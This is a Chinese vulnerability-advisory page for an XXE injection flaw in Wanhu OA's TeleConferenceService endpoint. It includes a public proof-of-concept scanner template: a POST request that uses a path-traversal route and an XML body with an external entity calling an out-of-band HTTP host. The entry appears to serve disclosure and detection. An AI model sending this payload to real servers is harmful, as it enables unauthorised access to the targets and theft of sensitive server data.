wanhu-oa-tele-conference-service-xxe: 万户OA TeleConferenceService XXE注入漏洞

日期: 2025-09-01 | 影响软件: 万户OA Tele Conference Service | POC: 已公开

漏洞描述

万户OA TeleConferenceService接口存在XXE注入漏洞,攻击者通过漏洞可以继续XXE注入获取服务器敏感信息 app="万户网络-ezOFFICE"

PoC代码[已公开]

id: wanhu-oa-tele-conference-service-xxe

info:
  name: 万户OA TeleConferenceService XXE注入漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    万户OA TeleConferenceService接口存在XXE注入漏洞,攻击者通过漏洞可以继续XXE注入获取服务器敏感信息
    app="万户网络-ezOFFICE"
  tags: wanhu,oa,xxe
  created: 2024/02/26

set:
  oob: oob()
  oobHTTP: oob.HTTP
rules:
  r0:
    request:
      method: POST
      path: /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService
      body: |
        <?xml version="1.0" encoding="UTF-8" ?>
        <!DOCTYPE ANY [
        <!ENTITY xxe SYSTEM "{{oobHTTP}}" >]>        
        <value>&xxe;</value>
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()

相关漏洞推荐